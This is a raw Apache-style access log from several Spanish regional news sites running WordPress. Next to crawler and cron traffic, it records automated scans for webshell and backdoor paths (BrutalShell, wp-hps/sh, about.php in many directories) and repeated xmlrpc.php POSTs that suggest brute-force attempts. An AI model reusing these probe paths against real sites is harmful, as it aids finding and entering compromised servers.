74.80.182.0 - - [02/Feb/2024:20:13:28 +0100] "GET /wp-content/plugins/aryabot/ HTTP/1.1" 404 596 cronicadelpaisvalenciano.com "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" "-"
74.80.182.0 - - [02/Feb/2024:20:13:29 +0100] "GET /wp-content/plugins/BrutalShell/ HTTP/1.1" 404 596 cronicadelpaisvalenciano.com "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" "-"
74.80.182.0 - - [02/Feb/2024:20:13:29 +0100] "GET /wp-content/plugins/cache-wordpress/ HTTP/1.1" 404 596 cronicadelpaisvalenciano.com "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" "-"
74.80.182.0 - - [02/Feb/2024:20:13:29 +0100] "GET /wp-content/plugins/cakil/ HTTP/1.1" 404 596 cronicadelpaisvalenciano.com "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" "-"
74.80.182.0 - - [02/Feb/2024:20:13:30 +0100] "GET /wp-content/plugins/cekidot/ HTTP/1.1" 404 596 cronicadelpaisvalenciano.com "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" "-"
74.80.182.0 - - [02/Feb/2024:20:13:30 +0100] "GET /wp-content/plugins/db/ HTTP/1.1" 404 596 cronicadelpaisvalenciano.com "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" "-"
74.80.182.0 - - [02/Feb/2024:20:13:30 +0100] "GET /wp-content/plugins/home/ HTTP/1.1" 404 596 cronicadelpaisvalenciano.com "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" "-"
74.80.182.0 - - [02/Feb/2024:20:13:31 +0100] "GET /wp-content/plugins/limit/ HTTP/1.1" 404 596 cronicadelpaisvalenciano.com "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" "-"
74.80.182.0 - - [02/Feb/2024:20:13:31 +0100] "GET /wp-content/plugins/owfsmac/ HTTP/1.1" 404 596 cronicadelpaisvalenciano.com "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0" "-"
74.80.182.0 - - [02/Feb/2024:20:13:31 +0100] "GET /wp-content/plugins/prenota/ HTTP/1.1" 404 596 cronicadelpaisvalenciano.com "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" "-"
74.80.182.0 - - [02/Feb/2024:20:13:32 +0100] "GET /wp-content/plugins/random/ HTTP/1.1" 404 596 cronicadelpaisvalenciano.com "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-"
74.80.182.0 - - [02/Feb/2024:20:13:32 +0100] "GET /wp-content/plugins/ubh/ HTTP/1.1" 404 596 cronicadelpaisvalenciano.com "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" "-"
74.80.182.0 - - [02/Feb/2024:20:13:32 +0100] "GET /wp-content/plugins/Uwogh-Segs/ HTTP/1.1" 404 596 cronicadelpaisvalenciano.com "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" "-"
74.80.182.0 - - [02/Feb/2024:20:13:32 +0100] "GET /wp-content/plugins/wp-diambar/includes/ HTTP/1.1" 404 596 cronicadelpaisvalenciano.com "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" "-"
74.80.182.0 - - [02/Feb/2024:20:13:33 +0100] "GET /wp-content/plugins/wp-freeform/ HTTP/1.1" 404 596 cronicadelpaisvalenciano.com "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" "-"
74.80.182.0 - - [02/Feb/2024:20:13:33 +0100] "GET /wp-content/plugins/wp-hps/sh/ HTTP/1.1" 404 596 cronicadelpaisvalenciano.com "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36" "-"
74.80.182.0 - - [02/Feb/2024:20:13:33 +0100] "GET /wp-content/plugins/wpeazvp/ HTTP/1.1" 404 596 cronicadelpaisvalenciano.com "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" "-"
74.80.182.0 - - [02/Feb/2024:20:13:34 +0100] "GET /wp-content/plugins/zaen/includes/ HTTP/1.1" 404 596 cronicadelpaisvalenciano.com "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" "-"
74.80.182.0 - - [02/Feb/2024:20:13:34 +0100] "GET /wp-content/plugins/core-stab/ HTTP/1.1" 404 596 cronicadelpaisvalenciano.com "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" "-"
74.80.182.0 - - [02/Feb/2024:20:13:34 +0100] "GET /wp-content/themes/alera/ HTTP/1.1" 404 596 cronicadelpaisvalenciano.com "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0" "-"
74.80.182.0 - - [02/Feb/2024:20:13:35 +0100] "GET /wp-content/themes/rishi/ HTTP/1.1" 404 596 cronicadelpaisvalenciano.com "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0" "-"
74.80.182.0 - - [02/Feb/2024:20:13:35 +0100] "GET /wp-content/themes/sketch/ HTTP/1.1" 404 596 cronicadelpaisvalenciano.com "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" "-"
74.80.182.0 - - [02/Feb/2024:20:13:35 +0100] "GET /wp-content/themes/thuoc-nam/ HTTP/1.1" 404 596 cronicadelpaisvalenciano.com "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko" "-"
74.80.182.0 - - [02/Feb/2024:20:13:36 +0100] "GET /wp-content/themes/twentyfive/ HTTP/1.1" 404 596 cronicadelpaisvalenciano.com "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" "-"
74.80.182.0 - - [02/Feb/2024:20:13:36 +0100] "GET /wp-content/themes/wp-pridmag/ HTTP/1.1" 404 596 cronicadelpaisvalenciano.com "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" "-"
74.80.182.0 - - [02/Feb/2024:20:13:36 +0100] "GET /wp-content/themes/pridmag/ HTTP/1.1" 404 596 cronicadelpaisvalenciano.com "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" "-"
74.80.182.0 - - [02/Feb/2024:20:13:37 +0100] "GET /wp-content/themes/zakra/ HTTP/1.1" 404 596 cronicadelpaisvalenciano.com "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" "-"
74.80.182.0 - - [02/Feb/2024:20:13:37 +0100] "GET /wp-content/uploads/simple-file-list/ HTTP/1.1" 404 596 cronicadelpaisvalenciano.com "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0" "-"
74.80.182.0 - - [02/Feb/2024:20:13:37 +0100] "GET /admin/upload/ HTTP/1.1" 404 596 cronicadelpaisvalenciano.com "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" "-"
74.80.182.0 - - [02/Feb/2024:20:13:38 +0100] "GET /wp-admin/css/colors/blue/ HTTP/1.1" 404 596 cronicadelpaisvalenciano.com "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" "-"
74.80.182.0 - - [02/Feb/2024:20:13:38 +0100] "GET /up/.well-known/ HTTP/1.1" 404 596 cronicadelpaisvalenciano.com "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" "-"
74.80.182.0 - - [02/Feb/2024:20:13:38 +0100] "GET /wp-content/plugins/apikey/ HTTP/1.1" 404 596 cronicadelpaisvalenciano.com "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-"
185.191.171.0 - - [02/Feb/2024:20:14:42 +0100] "GET /politica/psoe-comunidad-de-madrid-como-un-atentado-contra-el-poder-judicial/ HTTP/1.1" 200 160933 cronicareinodearagon.com "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)" "-"
82.165.88.0 - - [02/Feb/2024:20:14:43 +0100] "POST /wp-cron.php?doing_wp_cron=1706901283.5725810527801513671875 HTTP/1.1" 200 - cronicareinodearagon.com "-" "WordPress/6.2.2; https://cronicareinodearagon.com" "-"
23.22.35.0 - - [02/Feb/2024:20:15:06 +0100] "GET /wp-content/uploads/2023/05/caminando-acompanados-huesca-360x180.jpg HTTP/1.1" 200 16929 cronicareinodearagon.com "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot)" "-"
23.22.35.0 - - [02/Feb/2024:20:15:18 +0100] "GET /wp-content/uploads/2023/05/ccoo-instalaciones-deprotivas-zaragoza-750x375.jpg HTTP/1.1" 200 58665 cronicareinodearagon.com "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot)" "-"
23.22.35.0 - - [02/Feb/2024:20:15:38 +0100] "GET /wp-content/uploads/2023/05/ccoo-instalaciones-deprotivas-zaragoza-360x180.jpg HTTP/1.1" 200 18181 cronicareinodearagon.com "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot)" "-"
82.165.88.0 - - [02/Feb/2024:20:15:45 +0100] "POST /wp-cron.php?doing_wp_cron=1706901345.4815459251403808593750 HTTP/1.1" 200 - cronicareinodearagon.com "-" "WordPress/6.2.2; https://cronicareinodearagon.com" "-"
185.191.171.0 - - [02/Feb/2024:20:15:45 +0100] "GET /aragon/covid-cuarentenas-coronavirus-sanidad-contactos/ HTTP/1.1" 200 159975 cronicareinodearagon.com "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)" "-"
54.36.149.0 - - [02/Feb/2024:20:16:20 +0100] "GET /opinion/poesia-y-espada/ HTTP/1.1" 200 162919 cronicareinodearagon.com "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" "-"
185.233.100.0 - - [02/Feb/2024:20:16:27 +0100] "POST /xmlrpc.php HTTP/1.1" 503 299 cronicareinodearagon.com "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" "-"
185.233.100.0 - - [02/Feb/2024:20:16:28 +0100] "POST /xmlrpc.php HTTP/1.1" 503 299 cronicareinodearagon.com "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" "-"
185.233.100.0 - - [02/Feb/2024:20:16:29 +0100] "POST /xmlrpc.php HTTP/1.1" 503 299 cronicareinodearagon.com "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" "-"
185.233.100.0 - - [02/Feb/2024:20:16:30 +0100] "POST /xmlrpc.php HTTP/1.1" 503 299 cronicareinodearagon.com "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" "-"
52.70.240.0 - - [02/Feb/2024:20:16:31 +0100] "GET /wp-content/uploads/2022/09/fotonoticia_20220904162456_1920-e1662318989660.jpg HTTP/1.1" 200 65583 cronicareinodearagon.com "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot)" "-"
185.233.100.0 - - [02/Feb/2024:20:16:31 +0100] "POST /xmlrpc.php HTTP/1.1" 503 299 cronicareinodearagon.com "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" "-"
157.55.39.0 - - [02/Feb/2024:20:16:35 +0100] "GET /uncategorized/la-junta-de-andalucia-muestra-en-un-video-el-avance-de-las-obras-del-metro-de-malaga/ HTTP/1.1" 301 - www.cronicareinodearagon.com "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" "-"
52.70.240.0 - - [02/Feb/2024:20:16:42 +0100] "GET /wp-content/uploads/2023/05/lamban-psoe-aragon-juventudes-360x180.jpg HTTP/1.1" 200 11668 cronicareinodearagon.com "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot)" "-"
52.70.240.0 - - [02/Feb/2024:20:16:46 +0100] "GET /wp-content/uploads/2023/05/lamban-psoe-aragon-juventudes-750x375.jpg HTTP/1.1" 200 33694 cronicareinodearagon.com "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot)" "-"
23.22.35.0 - - [02/Feb/2024:20:16:59 +0100] "GET /wp-content/uploads/2023/05/programa-aceleracion-startups-aragon.jpg HTTP/1.1" 200 47778 cronicareinodearagon.com "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot)" "-"
52.70.240.0 - - [02/Feb/2024:20:17:06 +0100] "GET /wp-content/uploads/2022/01/d94b674083982bb2fbedbeb549a91581000057-750x375.jpg HTTP/1.1" 200 28030 cronicareinodearagon.com "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot)" "-"
23.22.35.0 - - [02/Feb/2024:20:17:10 +0100] "GET /wp-content/uploads/2022/01/d94b674083982bb2fbedbeb549a91581000057-360x180.jpg HTTP/1.1" 200 10709 cronicareinodearagon.com "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot)" "-"
182.43.70.0 - - [02/Feb/2024:20:18:11 +0100] "GET / HTTP/1.1" 200 336 www.cronicadeasturias.com "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-"
182.43.70.0 - - [02/Feb/2024:20:18:11 +0100] "GET / HTTP/1.1" 200 336 www.cronicadevalencia.com "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-"
185.191.171.0 - - [02/Feb/2024:20:21:18 +0100] "GET /aragon/juanma-moreno-juan-marin-legislatura-elecciones-andalucia/ HTTP/1.1" 200 164049 cronicareinodearagon.com "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)" "-"
82.165.88.0 - - [02/Feb/2024:20:21:19 +0100] "POST /wp-cron.php?doing_wp_cron=1706901679.1406118869781494140625 HTTP/1.1" 200 - cronicareinodearagon.com "-" "WordPress/6.2.2; https://cronicareinodearagon.com" "-"
185.220.69.0 - - [02/Feb/2024:20:22:59 +0100] "GET /politica/lamban-asegura-que-las-renovables-son-una-magnifica-oportunidad-para-que-aragon-despegue/ HTTP/1.1" 200 159738 cronicareinodearagon.com "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12.5; rv:114.0) Gecko/20100101 Firefox/114.0" "-"
82.165.88.0 - - [02/Feb/2024:20:23:00 +0100] "POST /wp-cron.php?doing_wp_cron=1706901780.0253570079803466796875 HTTP/1.1" 200 - cronicareinodearagon.com "-" "WordPress/6.2.2; https://cronicareinodearagon.com" "-"
185.220.69.0 - - [02/Feb/2024:20:23:02 +0100] "POST /wp-comments-post.php HTTP/1.1" 302 - cronicareinodearagon.com "https://cronicareinodearagon.com/politica/lamban-asegura-que-las-renovables-son-una-magnifica-oportunidad-para-que-aragon-despegue/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12.5; rv:114.0) Gecko/20100101 Firefox/114.0" "-"
185.220.69.0 - - [02/Feb/2024:20:23:03 +0100] "GET /politica/lamban-asegura-que-las-renovables-son-una-magnifica-oportunidad-para-que-aragon-despegue/ HTTP/1.1" 200 159737 cronicareinodearagon.com "https://cronicareinodearagon.com/wp-comments-post.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12.5; rv:114.0) Gecko/20100101 Firefox/114.0" "-"
185.191.171.0 - - [02/Feb/2024:20:25:01 +0100] "GET /politica/presupuestos-andalucia-jaen-empresarios-universidad/ HTTP/1.1" 200 177732 cronicareinodearagon.com "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)" "-"
82.165.88.0 - - [02/Feb/2024:20:25:02 +0100] "POST /wp-cron.php?doing_wp_cron=1706901902.2857050895690917968750 HTTP/1.1" 200 - cronicareinodearagon.com "-" "WordPress/6.2.2; https://cronicareinodearagon.com" "-"
82.165.88.0 - - [02/Feb/2024:20:26:47 +0100] "POST /wp-cron.php?doing_wp_cron=1706902007.4759359359741210937500 HTTP/1.1" 200 - cronicareinodearagon.com "-" "WordPress/6.2.2; https://cronicareinodearagon.com" "-"
34.106.215.0 - - [02/Feb/2024:20:26:47 +0100] "POST /xmlrpc.php HTTP/1.1" 200 416 cronicareinodearagon.com "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0" "-"
213.202.233.0 - - [02/Feb/2024:20:26:51 +0100] "GET /wp-includes/Requests/about.php HTTP/1.1" 404 596 cronicadesevilla.com "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" "-"
213.202.233.0 - - [02/Feb/2024:20:27:08 +0100] "GET /wp-content/blogs.dir/about.php HTTP/1.1" 404 596 cronicadesevilla.com "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" "-"
213.202.233.0 - - [02/Feb/2024:20:27:18 +0100] "GET /wp-admin/images/about.php HTTP/1.1" 404 596 cronicadesevilla.com "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" "-"
213.202.233.0 - - [02/Feb/2024:20:27:26 +0100] "GET /wp-includes/blocks/about.php HTTP/1.1" 404 596 cronicadesevilla.com "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" "-"
213.202.233.0 - - [02/Feb/2024:20:27:49 +0100] "GET /wp-includes/SimplePie/about.php HTTP/1.1" 404 596 cronicadesevilla.com "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" "-"
213.202.233.0 - - [02/Feb/2024:20:28:24 +0100] "GET /wp-content/gallery/about.php HTTP/1.1" 404 596 cronicadesevilla.com "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" "-"
213.202.233.0 - - [02/Feb/2024:20:28:41 +0100] "GET /wp-includes/images/about.php HTTP/1.1" 404 596 cronicadesevilla.com "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" "-"
66.249.84.0 - - [02/Feb/2024:20:29:20 +0100] "GET /category/sociedad/feed/ HTTP/1.1" 200 16233 cronicareinodearagon.com "-" "FeedFetcher-Google; (+http://www.google.com/feedfetcher.html)" "-"
213.202.233.0 - - [02/Feb/2024:20:29:29 +0100] "GET /wp-includes/rest-api/about.php HTTP/1.1" 404 596 cronicadesevilla.com "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" "-"
3.224.220.0 - - [02/Feb/2024:20:29:38 +0100] "GET /wp-content/uploads/2022/10/hidrogeno-verde-y-sus-beneficios-750x375.jpg HTTP/1.1" 200 47463 cronicareinodearagon.com "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot)" "-"
213.202.233.0 - - [02/Feb/2024:20:30:14 +0100] "GET /wp-includes/style-engine/about.php HTTP/1.1" 404 596 cronicadesevilla.com "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" "-"
213.202.233.0 - - [02/Feb/2024:20:30:28 +0100] "GET /wp-includes/ID3/about.php HTTP/1.1" 404 596 cronicadesevilla.com "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" "-"
213.202.233.0 - - [02/Feb/2024:20:30:53 +0100] "GET /wp-content/themes/about.php HTTP/1.1" 404 596 cronicadesevilla.com "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" "-"
213.202.233.0 - - [02/Feb/2024:20:31:00 +0100] "GET /wp-admin/css/about.php HTTP/1.1" 404 596 cronicadesevilla.com "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" "-"
213.202.233.0 - - [02/Feb/2024:20:31:18 +0100] "GET /wp-content/about.php HTTP/1.1" 404 596 cronicadesevilla.com "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" "-"
213.202.233.0 - - [02/Feb/2024:20:31:40 +0100] "GET /.well-known/about.php HTTP/1.1" 300 569 cronicadesevilla.com "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" "-"
213.202.233.0 - - [02/Feb/2024:20:32:24 +0100] "GET /cgi-bin/about.php HTTP/1.1" 404 596 cronicadesevilla.com "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" "-"
52.70.240.0 - - [02/Feb/2024:20:32:31 +0100] "GET /wp-content/uploads/2022/10/hidrogeno-verde-y-sus-beneficios-360x180.jpg HTTP/1.1" 200 16163 cronicareinodearagon.com "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot)" "-"
213.202.233.0 - - [02/Feb/2024:20:32:51 +0100] "GET /wp-includes/about.php HTTP/1.1" 404 596 cronicadesevilla.com "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" "-"
213.202.233.0 - - [02/Feb/2024:20:33:07 +0100] "GET /wp-admin/includes/about.php HTTP/1.1" 404 596 cronicadesevilla.com "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" "-"
82.165.88.0 - - [02/Feb/2024:20:33:36 +0100] "POST /wp-cron.php?doing_wp_cron=1706902416.8823769092559814453125 HTTP/1.1" 200 - cronicareinodearagon.com "-" "WordPress/6.2.2; https://cronicareinodearagon.com" "-"
85.208.96.0 - - [02/Feb/2024:20:33:36 +0100] "GET /robots.txt HTTP/1.1" 200 202 cronicareinodearagon.com "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)" "-"
185.191.171.0 - - [02/Feb/2024:20:33:38 +0100] "GET /aragon/detenidos-droga-algeciras/ HTTP/1.1" 200 164622 cronicareinodearagon.com "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)" "-"
23.22.35.0 - - [02/Feb/2024:20:33:43 +0100] "GET /wp-content/uploads/2023/05/fernando-rivares-podemos-zaragoza-360x180.jpg HTTP/1.1" 200 15019 cronicareinodearagon.com "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot)" "-"
82.165.88.0 - - [02/Feb/2024:20:33:50 +0100] "POST /wp-cron.php?doing_wp_cron=1706902430.8779509067535400390625 HTTP/1.1" 200 - cronicareinodearagon.com "-" "WordPress/6.2.2; https://cronicareinodearagon.com" "-"
54.36.148.0 - - [02/Feb/2024:20:33:50 +0100] "GET /aragon/encuesta-flash-cis-elecciones-aragon/ HTTP/1.1" 200 33923 cronicareinodearagon.com "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)" "-"
213.202.233.0 - - [02/Feb/2024:20:34:07 +0100] "GET /images/about.php HTTP/1.1" 404 596 cronicadesevilla.com "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" "-"
185.191.171.0 - - [02/Feb/2024:20:34:16 +0100] "GET /aragon/policia-narcotrafico-drones-submarinos/ HTTP/1.1" 200 167917 cronicareinodearagon.com "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)" "-"
